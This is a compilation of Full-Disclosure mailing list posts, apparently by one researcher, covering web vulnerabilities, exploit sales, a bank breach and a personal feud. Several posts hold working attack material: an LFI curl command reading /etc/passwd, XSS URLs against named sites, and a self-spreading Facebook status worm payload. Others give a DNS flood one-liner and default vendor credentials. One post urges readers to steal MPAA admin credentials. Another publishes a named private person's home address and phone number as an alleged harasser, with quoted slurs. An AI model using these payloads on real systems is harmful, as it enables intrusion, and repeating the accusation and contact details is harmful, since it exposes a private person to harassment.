Re: [Full-disclosure] Bank of the West security contact?
Just wanted to post a follow-up to this and provide some context to make it known: * Bank of the West was contacted in 2011 to report a security issue * No response for 2 years * In late 2013, I receive a breach notification saying my own sensitive personal information was compromised via the EXACT SAME ISSUES I REPORTED. I also am led to believe employee information was compromised, which may include Social Security Number (SSN) details. Conclusions? * Bank of the West has NO WORKING SECURITY REPORTING MECHANISM for outside researchers and NO BUG BOUNTY PROGRAM * Bank of the West does not seem to take security and privacy seriously enough, as far as I can tell You should know this if you are an existing or potential customer / employee of Bank of the West... On Fri, Feb 7, 2014 at 9:27 PM, Kristian Erik Hermansen kristian.herman...@gmail.com wrote: Anyone have security contact at Bank of the West? -- Kristian Erik Hermansen https://www.linkedin.com/in/kristianhermansen https://profiles.google.com/kristian.hermansen -- Regards, Kristian Erik Hermansen https://www.linkedin.com/in/kristianhermansen https://google.com/+KristianHermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: Hacking Exposed: Virtualization Cloud Computing: Secrets Solutions
Anyone know? -- Forwarded message -- From: Kristian Erik Hermansen kristian.herman...@gmail.com Date: Thu, Mar 13, 2014 at 1:13 PM Subject: Hacking Exposed: Virtualization Cloud Computing: Secrets Solutions To: dailydave dailyd...@lists.immunityinc.com, dailyd...@lists.immunitysec.com Does anyone know if this book exists or has ever been released? Seems mythically unicorn-like and The Hoff didn't seem to have an answer either :) 1 Used from $742.67??? http://www.amazon.com/gp/product/B00BZTW7E2/ ... -- Regards, Kristian Erik Hermansen https://www.linkedin.com/in/kristianhermansen https://google.com/+KristianHermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] extension for Firefox to force HTTPS always?
On Fri, Oct 12, 2007 at 6:55 PM, valdis.kletni...@vt.edu wrote: What should this hypothetical extension do if it automagically redirects http: to https:, but the target server is something that is only listening on port 80 because it doesn't have https: enabled? https://www.cnn.com just sorta sits there for me. Hello from the future! This hypothetical extension would handle such cases...and will eventually be called HTTPS Everywhere :) [1] Keep an eye out for it in a few years... [1] https://www.eff.org/https-everywhere -- Kristian Erik Hermansen https://www.linkedin.com/in/kristianhermansen https://google.com/+KristianHermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Bank of the West security contact?
Anyone have security contact at Bank of the West? -- Kristian Erik Hermansen https://www.linkedin.com/in/kristianhermansen https://profiles.google.com/kristian.hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New DDoS attack vector
On Thu, May 19, 2011 at 7:24 PM, Dobbins, Roland rdobb...@arbor.net wrote: The assertion that 'previous Denial of Service attacks against the DNS servers received either malformed, fragmented, ICMP messages or TCP SYN, with invalid length, or oversized and some of these can be filtered by the firewalls or security appliances' is demonstrably false. DNS servers have been targeted by bogus queries intended to exhaust the DNS server resources directly, or via spoofed queries which are intended to generate reflection/amplification attacks, but which also have a deleterious effect on the performance of the abused open recursors, for many years. The posited scenario is unnecessarily complex. It's a heck of a lot easier to simply bombard targeted authoritative DNS servers with spoofed bogus queries from botnets and/or hit them with reflection/amplification attacks, rather than go through this elaborate steps of registering a domain, pointing the NS/MX records at the target, then generating lots of spam. The proximate attack method described - layer-7 DDoS via excessive queries - isn't new or unique, and the NS-record-related steps are unnecessary. There's simply no need to go to this amount of trouble to launch a DDoS attack against authoritative DNS servers, nor is such an attack as difficult to defend against as is claimed in the write-up, meaning that this attack methodology has no unique advantages to justify the extra steps regarding re-targeting NS/MX records and spam generation. Agreed. But I have seen this exact attack in action too, so it is being used effectively to cripple DNS servers. Whether or not the attacker chooses this method or the botnet vector, the more interesting aspect is what happens when a DNS server's cache hit ratio vastly deceases while this attack is in progress. From my specific calculations during a known attack of this type, a DNS server cluster was reduced in efficiency to 10% of the expected normal operating capacity. Losing 90% of your expected DNS capacity will ruin anyone's day especially during lunch time when DNS queries peak. The in-real-time fix is very simple and can be done in one iptables command. However, if you were really smart, you would buy Arbor to get very specialized DNS protection out-of-the-box. They have some DNS protocol-specific options that block/limit clients during these type of attacks. Go Arbor... -- Kristian Erik Hermansen http://www.linkedin.com/in/kristianhermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New DDoS attack vector
On Fri, May 20, 2011 at 4:29 AM, Balder balder.theglori...@googlemail.com wrote: * Why go to all this trouble when you could just do something like the following (replacing dig with something faster) - while true ; do dig $(/dev/urandom tr -dc A-Za-z0-9 | head -c 10 ).example.com MX ; done dnsperf is what you really want ;) -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google Urchin LFI (Local File Include) vulnerability
While fuzzing an Urchin web application, I discovered what appears to be an LFI vulnerability. Neither Secunia nor Google / Urchin appear to have reported this as a known issue. The problem lies in the gfid parameter passed to urchin.cgi. This was tested on a somewhat modified version of Urchin 5.7.03, but it appears that the gfid param can be influenced given the results. I don't have the ability to test further, but this appears valid and unpublished. Can anyone confirm they see similar behavior in the same version or other versions? PoC: $ curl -s -b '...cookie_data...' 'https://host/path/urchin.cgi?profile=...rid=13cmd=svggfid=/../../../../../../../../../../../etc/passwd%00.htmlie5=.svg' root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh ... -- Kristian Erik Hermansen http://www.linkedin.com/in/kristianhermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google Apps CSRF vector, email disruption
Hello Google et al, I have devised a proof-of-concept via Cross-Site Request Forgery that allows arbitrary unvalidated attackers to disrupt Google Apps email on any domain. For my time and research into this issue, I am offering to sell the vulnerability to you at a fair price compensation, within the next week. If I do not receive an offer to purchase prior to June 14, I will presume that you are not interested in patching this vulnerability or acquiring my intellectual property. At that time, I will sell it on the open market. Please let me know how you would like to proceed. Regards, -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google Buzz and blind CSRF attacks
Greetings, Google Buzz is an incredibly useful new social networking service. However, it is also quite vulnerable to persistent CSRF attacks when data is pulled from external data feeds. For instance, I encourage you to follow me me on Google Buzz by utilizing my profile below and clicking FOLLOW. You can probably also search for me in Google Buzz's interface within GMail as well. http://www.google.com/profiles/kristian.hermansen http://kristian-hermansen.blogspot.com/2010/02/google-buzz-csrf-test.html My proof-of-concept merely executes a denial of service against Google Buzz users for which the only recovery is to disable IMG tag loading, reload Google Buzz, and either mute the posting or unfollow me permanently. This is non-intrusive PoC to demonstrate weaknesses and the ever-increasing need to protect against CSRF attacks. I hope you enjoy the demonstration. Cheers, -- Kristian Erik Hermansen http://www.linkedin.com/in/kristianhermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Buzz and blind CSRF attacks
On Fri, Feb 12, 2010 at 7:08 AM, Cody Robertson c...@hawkhost.com wrote: Doesn't work for me It has been verified against multiple GMail users. You can try the direct link as well, but the issue is more effective within the Buzz interface. It doesn't look like you tested from a gmail account either (hawkhost.com?)... http://kristian-hermansen.blogspot.com/2010/02/google-buzz-csrf-test.html -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Intercepting Southern California Gas Company user credentials... (socalgas.com)
...should be pretty easy ;-) Company has been notified many times privately of this issue, but they appear incompetent. Time for public shaming. $ sslscan myaccount.socalgas.com | grep NULL Accepted SSLv3 0 bitsNULL-SHA Accepted SSLv3 0 bitsNULL-MD5 Accepted TLSv1 0 bitsNULL-SHA Accepted TLSv1 0 bitsNULL-MD5 NULL cipher SSL/TLS presents the illusion of security and customers should be aware that their credentials are easily intercepted. Wanna shut off someone's gas in Los Angeles? :-) -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Avocent exploit for sale
Hello! Please contact me if you are interested in purchasing an exploit for Avocent KVM devices. Tested on a few models, including DSR2035. I have references. Regards, -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Inquira: Multiple Vulnerabilities
Bonjour, During a recent penetration test, we discovered and worked with Inquira to close numerous web-based issues. The vendor has not replied back about a formal release of these issues, so I am posting this notice here to inform customers to check for an update for their products. You can contact Inquira via the link below. http://www.inquira.com/ Additionally, it is also advised that customers change the default passwords used by the affected software. For instance, the default Apache Tomcat administrator account details are listed below and should probably be added to publicly listed default password databases (phenoelit, etc). Vendor: Inquira Products: (multiple) Username: inquira Password: inquira123 Cheers, -- Kristian Erik Hermansen http://www.linkedin.com/in/kristianerikhermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] F4c3b00k Worm
Seems to be able to spread via automated status messages. When another user sees the hijacked status message, they are likely to execute the status updater payload as well, which then spreads to anyone else who can see those status updates. This document.cookie payload is benign. Emulation is achieved by pasting the payload below into Firefox while on the profile.php page... javascript:var p='profile_id='+document.getElementById('profile_id').value+'status=scriptalert(document.cookie);/script'+'profile=true'+'test_name=INLINE_STATUS_EDITOR'+'action=OTHER_UPDATE'+'post_form_id='+document.getElementById('post_form_id').value;hr=new XMLHttpRequest();hr.overrideMimeType('text/html');hr.open('POST', 'updatestatus.php', true);hr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');hr.setRequestHeader('Content-length', p.length);hr.setRequestHeader('Connection', 'close');hr.send(p); -- Kristian Erik Hermansen Have you tried Session Destroyer yet? http://kristian.hermansen.googlepages.com/session.destroyer.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Announcing Session Destroyer -- Invalidate your webapp logins with ease!
The art of Crowd SuRFing the massess. This proof-of-concept handles most of the Alexa Top 100 websites that require logins. Mainly just US sites for now, but more will be added later. If you pull this into an IFRAME on your site, you can mess with lots of people. Nothing new. Just something fun for the season. Cheers and happy holidays :-) http://kristian.hermansen.googlepages.com/session.destroyer.html -- Kristian Erik Hermansen Have you tried Session Destroyer yet? http://kristian.hermansen.googlepages.com/session.destroyer.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Health website vulnerable to hacking, no response from admins after multiple attempts
I tried repeatedly to contact them. For the benefit of the health patients using this website, can someone please investigate? Thanks... https://secure.westclifflabs.com/secure/billing/default.asp -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle DB security contact email address?
Anyone have it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google GrandCentral XSS 0day
On Sun, Jun 1, 2008 at 1:00 PM, Kristian Erik Hermansen [EMAIL PROTECTED] wrote: Enjoy... http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3Dsrchinbxtype=srchcncttype=search_keywords= Google has seemingly fixed this 0day in under 12 hours. Congrats to our boys at the GOOG... -- Kristian Erik Hermansen -- When you share your joys you double them; when you share your sorrows you halve them. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google GrandCentral XSS 0day
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Enjoy... http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3Dsrchinbxtype=srchcncttype=search_keywords= - -- Kristian Erik Hermansen - -- When you share your joys you double them; when you share your sorrows you halve them. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFIQv5xS292tflSrWIRAijQAKCYSJbYX6QtvcwP2Ycr8s5pe/iYCwCgsUbe ivCDR6KOABF6Q/T91teWU1M= =srPE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google GrandCentral XSS 0day
Enjoy... http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3Dsrchinbxtype=srchcncttype=search_keywords= -- Kristian Erik Hermansen -- When you share your joys you double them; when you share your sorrows you halve them. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Andrew A - Benjamin Trott, Six Apart/Live Journal hacker, and belligerent anti-gay remarks?
After the recent death of Justin Polazzo -- a dude who I only corresponded with over the net -- I noticed another post from Andrew A, which touted some horrible remarks. I don't know who Andrew A is, but he and I have had a running conversation publicly and privately. He has proven to be quite immature. I can offer some knowledge that he has provided to me privately to point at who it might be, but I make no guarantee to who the individual is. It is merely from his mouth. He wanted to meet me at the art gatherings in San Francisco's 20GOTO10, and give me a piece of his mind. He called me a pussy faggot when I did not attend Christopher Abad's showing of ASCII art on those dates. Following is some insight that may help some people on this list track down who this Andrew A is. It is a very sad day when we lose someone in real life and we must all rethink what is happening in our security community when people take pride in laughing at such loss of life. The Internet may just be the flicking of electrons passing around in an invisible flux, but the people at the edge of our networks are real. We must treat them with the same respect we would treat others with in person. We must forgive. We must forget. We must do our best to unite our communities rather than divide them. We have all made our own mistakes in the past, so let's continue our journey with a new goal -- that of trying to be good to one another in real life and online, despite its virtualness. We must do that. I have hope that we can accomplish decency online... http://www.kristian-hermansen.com/wordpress/2008/02/11/benjamin-trott-and-belligerent-anti-gay-remarks/ Benjamin Trott is an American entrepreneur living in California. He is known for co-founding Six Apart (6 Apart, or 6A), which later purchased Live Journal. However, online, it appears that he may be acting under a pseudonym as Andrew A ([EMAIL PROTECTED], gluttony). It all started back in December in San Francisco. An observation of mine regarding fetching favicon images in certain contexts, which many people I have spoken to consider a bug in some web browsers, turned into a flame-war on the full disclosure list and many accusations were flying. However, the discussion continued off-list privately where Andrew A continued with belligerent and even anti-gay remarks. It is just disgusting that someone of this stature would expend so much energy and hatred. I just want it to stop, but this person, whom I believe is Benjamin Trott, continues to harass me and it is unwarranted. Please stop and grow up Andrew A ([EMAIL PROTECTED]). The purported Andrew A claims to live at this residence, perhaps with his wife Mena G. Trott: 4338 26th street, San Francisco, CA His phone number appears to be (415) 821-2073. Andrew A should just quit this silliness and apologize. I felt the need to post this information in the case that others have been harassed by this individual. Delivered-To: [EMAIL PROTECTED] Received: by 10.141.98.17 with SMTP id a17cs38059rvm; Fri, 14 Dec 2007 14:14:31 -0800 (PST) Received: by 10.150.155.1 with SMTP id c1mr1361744ybe.85.1197670470807; Fri, 14 Dec 2007 14:14:30 -0800 (PST) Received: by 10.151.12.9 with HTTP; Fri, 14 Dec 2007 14:14:30 -0800 (PST) Message-ID: [EMAIL PROTECTED] Date: Fri, 14 Dec 2007 14:14:30 -0800 From: Andrew A To: Kristian Erik Hermansen Subject: Re: Mr. Andrew Anonymous In-Reply-To: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=―-=_Part_751_2843694.1197670470804″ References: [EMAIL PROTECTED] ――=_Part_751_2843694.1197670470804 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline I live out of Orange County but I visit the bay for business and pleasure. No way am I gonna roll to Baysec or Berksec though. Do I look like a clueless wannabe faggot like you? I may be at the 20goto10 ansi show, but I'll definitely be at the buttes 20goto10 show. See you there. I'll introduce myself. Delivered-To: [EMAIL PROTECTED] Received: by 10.100.226.20 with SMTP id y20cs604319ang; Sun, 10 Feb 2008 11:00:03 -0800 (PST) Received: by 10.78.193.5 with SMTP id q5mr27381979huf.4.1202670001651; Sun, 10 Feb 2008 11:00:01 -0800 (PST) Received: by 10.78.29.5 with HTTP; Sun, 10 Feb 2008 11:00:01 -0800 (PST) Message-ID: [EMAIL PROTECTED] Date: Sun, 10 Feb 2008 11:00:01 -0800 From: Andrew A To: Kristian Erik Hermansen Subject: Re: Mr. Andrew Anonymous In-Reply-To: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=―-=_Part_26650_5443580.1202670001597″ References: [EMAIL PROTECTED] [EMAIL PROTECTED] ――=_Part_26650_5443580.1202670001597 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline I didnt see you at either 20goto10 show. pussy faggot. 4338 26th street, san francisco ask for ben. fuck you. Delivered-To: [EMAIL PROTECTED] Received: by 10.141.156.14 with SMTP id i14cs18074rvo; Sun, 10 Feb 2008 16:29:13 -0800 (PST
Re: [Full-disclosure] RIP Dude VanWinkle
This news saddens me greatly. Justin and I had plans to meet up at SPICON in Atlanta just a few months ago, but he bailed out and never came down. Was he a bit shy of social gatherings? I told him that a group of us would be getting dinner and drinks, but I never heard back from him. He finally responded a week later, after the conference, saying he was busy. Does anyone know the cause of death? It's really a bummer :-( The dude abides... And I'm talkin' about the Dude here -- sometimes there's a man who, well, he's the man for his time'n place, he fits right in there -- and that's the Dude, -- Kristian Erik Hermansen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 34, Issue 31
On Dec 12, 2007 9:01 PM, Andrew A [EMAIL PROTECTED] wrote: PPS-- Namedropping the head of a project you plagiarized from in your cover letter is not good policy. Especially in this industry. Its a smaller world than most, and now you're blackballed buddy. You'll work as desktop support at FOX forever. On this list you may act like the lack of credit was some sort of forgetful slip, but most people have been relayed by now that you directly claimed authorship of said shellcode in an interview. Andrew, you certainly are misinformed. I did not claim authorship for anything, as you say. I don't even know who this individual is that you are talking about. The only thing I can think of that you have mentioned is something I put together for H D Moore and the metasploit team to resolve the licensing issues for getting msf3 into Ubuntu's multiverse repository. You can see the full efforts of this, and some of my code, at the link below... https://bugs.launchpad.net/ubuntu/+bug/102212 Some stuff was sent to the msfdev list as well, so if you are on that team, you would know. All I wanted to do was clean up the msf3 code to meet Debian package specifications. However, it was not possible to get msf3 into Debian/Ubuntu without violating the Metasploit license. H D did say they may rewrite the license in a future version. Even if I mentioned this msf3 effort during an interview, and I don't even recall if I did, then your point is still moot. I tried to do something for the community of users who run msf on Linux, which was make metasploit more accessible to them. If you think that's bad, then thats fine. This whole discussion started with presenting the fact that the favicon issue could be a useful attack vector that people may not have thought of before. I can't change the fact that people in the security community will always be hostile. There is something about this community, and it doesn't happen like this anywhere else, where people can be just so belligerent. I try to have fun and have a good time in/out of work, and maybe you don't know that about me. I am light-hearted and enjoy the company of my peers. Ask anyone who has had a drink with me, or even too many drinks! We always have fun. Even if I poke fun at people, it is usually in a fair way, showing reason to feel that way. Your attitude is based on things which are made up, false, and you have no base to stand on with such hostility. Just turn that frown upside-down and remember that life shouldn't be so serious. Take it easy and have fun. It is not the end of the world. I will buy some beers to chill your hot head if you like... -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 34, Issue 31
On Dec 12, 2007 9:01 PM, Andrew A [EMAIL PROTECTED] wrote: Actually, the suggested prevention tactic is to create a post variable in your form of type hidden with a securely generated one-time ticket that an attacker would not be able to scrape without performing an xmlhttp call, therefore signalling a (real) security problem with the app in question. Requiring the user to re-input their login credentials for every database write would be absolutely ridiculous from both a design and security perspective. But then again, you must know all this with your extensive experience in web app security and development. Yeah dude, we would call that a nonce. Your definition is fine too though... -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google / GMail bug, all accounts vulnerable
On Dec 11, 2007 3:01 PM, Aaron Katz [EMAIL PROTECTED] wrote: My strong suspicion is that the original poster simply created a JavaScript script in somewhere.google.com, and this JavaScript deleted the cookie. This would work if the session cookie is restricted to google.com, which would let any web server in, or content served from the google.com domain (or any subdomain). My note about using NoScript to restrict JavaScript execution to mail.google.com reinforces this suspicion. If my suspicion is correct, then google did two things. First, google appears to allow individuals to create personal domain names in google.com, and to place arbitrary content in those domains. This first thing probalby allowed the original poster to place the JavaScript in a location where it could access the google.com cookie. Second, google apparantly did not restrict the gmail cookie to mail.google.com. This second thing allowed the JavaScript from the personal system at somewhere.google.com to access the cookie. Of course, I only did a cursory glance at the source of the webpage, so I may be wrong :) But, we can be reasonably sure it's not exploiting a problem in the browser, since the issue appears to be cross browser. Well, let me just say that NoScript will not save you here in my example. Try this to see how to really mess with your brain... * Open Firefox 2.x (delete all cookies/cached objects if you like, etc) * Check an email in Google * Visit my PoC code page in a new tab * Click on the Google tab and try to read an email * Something went wrong... * Log back into Google * Browse around your email, or not, doesn't matter * Merely click on the tab for my PoC webpage * Something goes wrong again... Just clicking a tab in Firefox can mess with your Google account? Details will be released this Friday and will also include an exploit for Yahoo as well. Fair warning... -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google / GMail bug, all accounts vulnerable
On Dec 11, 2007 6:25 PM, coderman [EMAIL PROTECTED] wrote: favicons are handy ... even if handled quite differently between browser types/versions. Bingo to coderman, the only security dude here who gets it. You would be surprised the number of ridiculous personal emails I got regarding this issue. Crowd SuRFing is here to stay... -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google / GMail bug, all accounts vulnerable
On Dec 7, 2007 7:40 AM, Aaron Katz [EMAIL PROTECTED] wrote: Could you please explain the vulnerability? When I test, and I submit a correct response to the CAPTCHA, I'm presented with knowledge based authentication. The bug, unless Google fixed it already, will have an affect on your GMail account, but has nothing to do with CAPTCHAs. Here is an illustration * You are happily browsing some emails in GMail. * You then visit any website which utilizes my PoC. (one @ http://www.kristian-hermansen.com) * You try to use your GMail account, but something went wrong. * You ask yourself what happened... -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google / GMail bug, all accounts vulnerable
On Dec 7, 2007 9:41 PM, Joseph Hick [EMAIL PROTECTED] wrote: could someone please explain how this PoC works? I wonder why simply loading an image logs me out A paper will be presented next week on the topic of Crowd SuRFing...please wait until that time :-) -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google / GMail bug, all accounts vulnerable
Proof of concept here... http://www.kristian-hermansen.com -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day XSS for MPAA.org
On Dec 5, 2007 12:15 PM, [EMAIL PROTECTED] wrote: Ol? Kristian Hermafroditas you useless fagot, shoes of clown are apparent. Dude, you criticize everyone with the same hatred and bad english. Check out what you said about security researcher, and woman, Raven Adler just a few months ago. snip b?sicamente can you comment in the rumors that alike to the vast majority of female investigators of the security you used to be a man? beyond that on the rumors that with you shoes of clown are apparent and jacket sports is being worn ? /snip http://techlists.org/archives/security/fulldisclosure/2007-04/msg00336.shtml Ham Beast -- just take it easy, OK champ? You are probably the same guy in the seated conference crowd that shouted nasty things to Raven after her laptop was compromised by some unfortunate soul. 0day can happen to anyone ... lighten up ... we're all friends here :-) There is no need to bash other people just to bash other people. At least back up your claims with some factual evidence. For instance, why does Raven, as you say, wear clown shoes? -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Internet Explorer Vuln Report, Debunked [Jeff R. Jones is becoming FUD-master]
Jeff R. Jones, a director of security strategy for Microsoft, has issued another report on the security of Internet Explorer as compared to Mozilla Firefox. Now, we all understand that any software product will have security issues, but Mr. Jones bases his analysis on the fact that Mozilla patches more frequently. See the report here on his blog. http://blogs.technet.com/security/archive/2007/11/30/download-internet-explorer-and-firefox-vulnerability-analysis.aspx I have refuted the claims of a previous report on Microsoft Vista, but instead of doing that again, I think the following excellent quote sums up the entire analysis done by Mr. Jones - Just because dentists fix more teeth in America doesn't mean our teeth are worse than in Africa. -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 0day XSS for MPAA.org
As many of you have heard, the MPAA themselves are violating the GNU GPL. Such hypocrisy from a company which claims they adhere to copyrights :-) In protest, I took exactly 7 seconds to locate an XSS in their website and am posting it for your perusal. Maybe someone can use it in an email to an MPAA staff member, and perhaps can modify the payload to steal credentials for some MPAA admin interface. And perhaps then, after gaining MPAA credentials, this person can modify the MPAA website. And perhaps after that, we can all laugh at the MPAA yet again in their quest to sue 12 year old kids for downloading MP3 files... There are many more XSS on their site. Everyone knows that if you find one bug on top (without much effort), there are many more security issues hiding beneath the surface. I leave it up to the MPPA-haters out there to dig deeper and use it to influence the MPAA website... Here's one for the 'txtsearch' search field on the main page at MPAA.org in the top right-hand corner where it says 'Find the rating of a film'... ERR/tr/table/tdscriptalert('xss');/script -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Signature or checksum?
On Dec 2, 2007 7:00 AM, coderman [EMAIL PROTECTED] wrote: p.s. for the tin foil hat crowd, those digital sigs are looking weaker every year compared to cryptographic hash functions and block ciphers: http://dwave.wordpress.com/2007/11/26/slides-from-sc07-progress-in-quantum-computing-panel/ not to mention GNFS improvements the last few years... Don't forget Galois group and Fermat surface research :-P -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MD5 algorithm considered toxic (and harmful)
I know of many commercial security products which still utilize MD5 to prove integrity of the data they distribute to customers. This should no longer be considered appropriate. Now that tools are readily available to exploit newer MD5 collision research, I think it is safe to say that the public should retire its usage for good. Read the most recent research regarding chosen-prefix collisions: http://www.win.tue.nl/hashclash/EC07v2.0.pdf A concrete example for your perusal: [EMAIL PROTECTED]:/tmp$ wget http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe --04:36:32-- http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe = `HelloWorld-colliding.exe' Resolving www.win.tue.nl... 131.155.70.190 Connecting to www.win.tue.nl|131.155.70.190|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 41,792 (41K) [application/octet-stream] 100%[] 41,792 109.16K/s 04:36:33 (108.92 KB/s) - `HelloWorld-colliding.exe' saved [41792/41792] [EMAIL PROTECTED]:/tmp$ wget http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe --04:36:37-- http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe = `GoodbyeWorld-colliding.exe' Resolving www.win.tue.nl... 131.155.70.190 Connecting to www.win.tue.nl|131.155.70.190|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 41,792 (41K) [application/octet-stream] 100%[] 41,792 127.20K/s 04:36:38 (126.82 KB/s) - `GoodbyeWorld-colliding.exe' saved [41792/41792] [EMAIL PROTECTED]:/tmp$ ls -lsha *.exe 44K -rw-r--r-- 1 khermans khermans 41K 2007-11-23 01:08 GoodbyeWorld-colliding.exe 44K -rw-r--r-- 1 khermans khermans 41K 2007-11-23 01:08 HelloWorld-colliding.exe [EMAIL PROTECTED]:/tmp$ strings HelloWorld-colliding.exe | tail SetFilePointer MultiByteToWideChar LCMapStringA LCMapStringW GetStringTypeA GetStringTypeW SetStdHandle 